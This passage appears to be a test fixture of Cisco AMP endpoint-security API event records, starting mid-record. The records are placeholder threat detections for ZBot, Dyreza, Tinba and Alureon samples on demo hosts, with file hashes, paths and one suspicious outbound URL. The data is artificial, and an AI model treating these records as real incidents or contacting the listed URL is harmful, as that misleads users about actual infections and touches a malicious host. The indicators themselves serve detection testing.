Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 